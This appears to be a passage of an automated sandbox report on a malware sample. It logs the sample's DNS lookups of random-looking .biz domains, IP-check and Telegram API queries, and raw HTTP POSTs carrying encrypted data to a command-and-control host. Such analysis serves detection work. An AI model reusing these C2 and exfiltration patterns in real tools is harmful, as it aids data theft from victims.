                                                                                                                                                        Jan 10, 2025 21:41:34.326600075 CET804971872.52.178.23192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.326632023 CET804971872.52.178.23192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.876637936 CET804971872.52.178.23192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.893744946 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:34.898724079 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.898925066 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:34.899106026 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:34.904206991 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.926738977 CET4971880192.168.2.1172.52.178.23
                                                                                                                                                        Jan 10, 2025 21:41:35.542201042 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542227983 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542279959 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542290926 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542303085 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542316914 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542349100 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.542349100 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.542372942 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542382002 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.542387009 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542401075 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542412996 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.542469978 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.542469978 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.547261953 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.547275066 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.547287941 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.547300100 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.547338009 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.547385931 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.547557116 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.598392963 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.628801107 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.628818989 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.628909111 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.740994930 CET4971880192.168.2.1172.52.178.23
                                                                                                                                                        Jan 10, 2025 21:41:35.741106987 CET4971880192.168.2.1172.52.178.23
                                                                                                                                                        Jan 10, 2025 21:41:35.746145010 CET804971872.52.178.23192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.746191978 CET804971872.52.178.23192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.889214993 CET804971872.52.178.23192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.890352011 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:35.895375013 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:35.942442894 CET4971880192.168.2.1172.52.178.23
                                                                                                                                                        Jan 10, 2025 21:41:36.190814018 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.190834999 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.190896988 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:36.191052914 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191095114 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191143036 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191169024 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191210032 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:36.191210032 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:36.191292048 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191374063 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191385984 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191447020 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:36.191823006 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191847086 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191894054 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:36.191922903 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.191970110 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:36.192008972 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.192022085 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.192034006 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.192048073 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.192118883 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:41:36.398118973 CET4972080192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:36.402904034 CET804972018.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.402982950 CET4972080192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:36.403197050 CET4972080192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:36.403213978 CET4972080192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:36.408027887 CET804972018.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.408039093 CET804972018.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:37.676655054 CET4972080192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:37.698838949 CET4972180192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:37.703717947 CET804972118.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:37.703838110 CET4972180192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:37.704047918 CET4972180192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:37.704093933 CET4972180192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:37.708864927 CET804972118.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:37.708878994 CET804972118.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:39.103491068 CET804972118.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:39.103564978 CET804972118.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:39.103652954 CET4972180192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:39.103831053 CET4972180192.168.2.1118.141.10.107
                                                                                                                                                        Jan 10, 2025 21:41:39.108658075 CET804972118.141.10.107192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:39.452225924 CET4972280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:41:39.457123995 CET804972282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:39.457221031 CET4972280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:41:39.457382917 CET4972280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:41:39.457396984 CET4972280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:41:39.462189913 CET804972282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:39.462238073 CET804972282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:00.831207991 CET804972282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:00.831280947 CET4972280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:00.831577063 CET4972280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:00.836369991 CET804972282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:01.282387018 CET4981380192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:01.287236929 CET804981382.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:01.287329912 CET4981380192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:01.433628082 CET4981380192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:01.433671951 CET4981380192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:01.438512087 CET804981382.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:01.438525915 CET804981382.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:07.493652105 CET8049705158.101.44.242192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:07.493720055 CET4970580192.168.2.11158.101.44.242
                                                                                                                                                        Jan 10, 2025 21:42:22.641138077 CET804981382.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:22.641222954 CET4981380192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:22.641602039 CET4981380192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:22.646352053 CET804981382.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:22.769795895 CET4994280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:22.774629116 CET804994282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:22.777445078 CET4994280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:22.777595997 CET4994280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:22.777622938 CET4994280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:22.782414913 CET804994282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:22.782433987 CET804994282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:32.790792942 CET4971880192.168.2.1172.52.178.23
                                                                                                                                                        Jan 10, 2025 21:42:32.790879965 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:42:32.795933962 CET804971872.52.178.23192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:32.796066999 CET4971880192.168.2.1172.52.178.23
                                                                                                                                                        Jan 10, 2025 21:42:32.796242952 CET804971913.248.148.254192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:32.796293020 CET4971980192.168.2.1113.248.148.254
                                                                                                                                                        Jan 10, 2025 21:42:35.895804882 CET4970580192.168.2.11158.101.44.242
                                                                                                                                                        Jan 10, 2025 21:42:35.900638103 CET8049705158.101.44.242192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:44.144510984 CET804994282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:44.144717932 CET4994280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:44.684739113 CET4994280192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:44.689573050 CET804994282.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:44.885756016 CET4999080192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:44.890613079 CET804999082.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:44.890714884 CET4999080192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:44.891060114 CET4999080192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:44.891087055 CET4999080192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:42:44.895899057 CET804999082.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:44.895910025 CET804999082.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:43:06.271750927 CET804999082.112.184.197192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:43:06.271833897 CET4999080192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:43:06.271892071 CET4999080192.168.2.1182.112.184.197
                                                                                                                                                        Jan 10, 2025 21:43:06.276632071 CET804999082.112.184.197192.168.2.11
                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 10, 2025 21:40:41.120148897 CET5688853192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:40:41.127829075 CET53568881.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:41.489829063 CET6133553192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:40:41.497086048 CET53613351.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:50.145417929 CET5704453192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:40:50.152275085 CET53570441.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:40:55.161128998 CET6326353192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:40:55.168055058 CET53632631.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:02.592142105 CET5084853192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:02.599420071 CET53508481.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:05.701571941 CET5448753192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:05.709022045 CET53544871.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:07.478125095 CET6084953192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:07.485328913 CET53608491.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:33.710638046 CET5835453192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:33.717946053 CET53583541.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.264251947 CET5870053192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:34.271455050 CET53587001.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:34.883013964 CET5726653192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:34.890124083 CET53572661.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.313915014 CET6055353192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:36.323036909 CET53605531.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:36.323846102 CET5588753192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:36.331206083 CET53558871.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:39.157152891 CET5929753192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:39.164943933 CET53592971.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:39.167581081 CET5705953192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:39.175019026 CET53570591.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:41:39.175864935 CET5800353192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:41:39.386456013 CET53580031.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:42:22.642429113 CET5790953192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:42:22.729996920 CET53579091.1.1.1192.168.2.11
                                                                                                                                                        Jan 10, 2025 21:43:06.272766113 CET5800053192.168.2.111.1.1.1
                                                                                                                                                        Jan 10, 2025 21:43:06.281081915 CET53580001.1.1.1192.168.2.11
                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Jan 10, 2025 21:40:41.120148897 CET192.168.2.111.1.1.10xffcStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:41.489829063 CET192.168.2.111.1.1.10x3a05Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:50.145417929 CET192.168.2.111.1.1.10x6b60Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:55.161128998 CET192.168.2.111.1.1.10xd13bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:02.592142105 CET192.168.2.111.1.1.10x97b1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:05.701571941 CET192.168.2.111.1.1.10xff8dStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:07.478125095 CET192.168.2.111.1.1.10x5547Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:33.710638046 CET192.168.2.111.1.1.10xc1dfStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:34.264251947 CET192.168.2.111.1.1.10x462cStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:34.883013964 CET192.168.2.111.1.1.10x473dStandard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:36.313915014 CET192.168.2.111.1.1.10x7cc1Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:36.323846102 CET192.168.2.111.1.1.10x4055Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:39.157152891 CET192.168.2.111.1.1.10x8932Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:39.167581081 CET192.168.2.111.1.1.10x4981Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:39.175864935 CET192.168.2.111.1.1.10x5b94Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:42:22.642429113 CET192.168.2.111.1.1.10x42ecStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:43:06.272766113 CET192.168.2.111.1.1.10x9104Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Jan 10, 2025 21:40:41.127829075 CET1.1.1.1192.168.2.110xffcNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:41.497086048 CET1.1.1.1192.168.2.110x3a05No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:50.152275085 CET1.1.1.1192.168.2.110x6b60No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:50.152275085 CET1.1.1.1192.168.2.110x6b60No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:50.152275085 CET1.1.1.1192.168.2.110x6b60No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:50.152275085 CET1.1.1.1192.168.2.110x6b60No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:50.152275085 CET1.1.1.1192.168.2.110x6b60No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:50.152275085 CET1.1.1.1192.168.2.110x6b60No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:55.168055058 CET1.1.1.1192.168.2.110xd13bNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:55.168055058 CET1.1.1.1192.168.2.110xd13bNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:55.168055058 CET1.1.1.1192.168.2.110xd13bNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:55.168055058 CET1.1.1.1192.168.2.110xd13bNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:55.168055058 CET1.1.1.1192.168.2.110xd13bNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:55.168055058 CET1.1.1.1192.168.2.110xd13bNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:40:55.168055058 CET1.1.1.1192.168.2.110xd13bNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:02.599420071 CET1.1.1.1192.168.2.110x97b1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:05.709022045 CET1.1.1.1192.168.2.110xff8dNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:07.485328913 CET1.1.1.1192.168.2.110x5547No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:33.717946053 CET1.1.1.1192.168.2.110xc1dfNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:34.271455050 CET1.1.1.1192.168.2.110x462cNo error (0)przvgke.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:34.890124083 CET1.1.1.1192.168.2.110x473dNo error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:34.890124083 CET1.1.1.1192.168.2.110x473dNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:34.890124083 CET1.1.1.1192.168.2.110x473dNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:36.323036909 CET1.1.1.1192.168.2.110x7cc1Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:36.331206083 CET1.1.1.1192.168.2.110x4055No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:39.164943933 CET1.1.1.1192.168.2.110x8932Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:39.175019026 CET1.1.1.1192.168.2.110x4981Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:41:39.386456013 CET1.1.1.1192.168.2.110x5b94No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:42:22.729996920 CET1.1.1.1192.168.2.110x42ecNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 10, 2025 21:43:06.281081915 CET1.1.1.1192.168.2.110x9104No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                        • api.telegram.org
                                                                                                                                                        • pywolwnvd.biz
                                                                                                                                                        • checkip.dyndns.org
                                                                                                                                                        • ssbzmoy.biz
                                                                                                                                                        • cvgrf.biz
                                                                                                                                                        • npukfztj.biz
                                                                                                                                                        • przvgke.biz
                                                                                                                                                        • ww12.przvgke.biz
                                                                                                                                                        • knjghuig.biz
                                                                                                                                                        • lpuegx.biz
                                                                                                                                                        • vjaxhpbji.biz
                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.114970354.244.188.177806760C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 10, 2025 21:40:42.798125029 CET351OUTPOST /uljtmx HTTP/1.1
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                        Content-Length: 850
                                                                                                                                                        Jan 10, 2025 21:40:42.798156977 CET850OUTData Raw: c8 da 14 83 92 3b f4 21 46 03 00 00 7d 4b 99 f3 d4 29 bb b9 7d cb 9c 6f 75 b0 a3 bd 2d 0f 80 8e cf a1 0e ea 90 49 93 8b b9 f1 e6 c5 11 c9 f0 c2 7f c1 8f e9 09 9c c2 f3 f2 be a2 e8 09 35 3f 36 d6 cc fb ce 44 94 6e 4e d3 4a 1b d4 0b f3 cd 79 5b fc
                                                                                                                                                        Data Ascii: ;!F}K)}ou-I5?6DnNJy[L4:1;-C4G-^l)oEu?Ej8nSh~8xKU_6fkE(#qc0m+xzOXEV!>CWv|~|c1@(6!Mx2.x,XEi


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.114970454.244.188.177806528C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 10, 2025 21:40:43.164129019 CET359OUTPOST /lfsgndokapxyhw HTTP/1.1
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                        Content-Length: 800
                                                                                                                                                        Jan 10, 2025 21:40:43.164148092 CET800OUTData Raw: 87 6c bd fe 0e 0f 6c 6a 14 03 00 00 7c c6 e8 17 98 3c 91 a8 42 51 28 fe a9 d6 29 c0 43 97 37 55 25 20 49 a3 ba 69 49 24 99 98 e4 cc c7 ec b1 fd 17 5d 5f 28 aa 64 ed 40 8c 11 1f 44 0a e9 51 ad 25 5b 82 96 5b 9a 99 26 13 7f 0f 12 aa 15 97 c4 a7 c2
                                                                                                                                                        Data Ascii: llj|<BQ()C7U% IiI$]_(d@DQ%[[&e;A9.{7&><s\'}G?bKeZ|DEc@^}f8P|Yv~6SZUO?ujpN^-Z~eE;J [\<3Pff,sfOaafQ


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.1149705158.101.44.242804068C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 10, 2025 21:40:50.177288055 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 10, 2025 21:40:53.560585022 CET321INHTTP/1.1 200 OK
                                                                                                                                                        Date: Fri, 10 Jan 2025 20:40:53 GMT
                                                                                                                                                        Content-Type: text/html
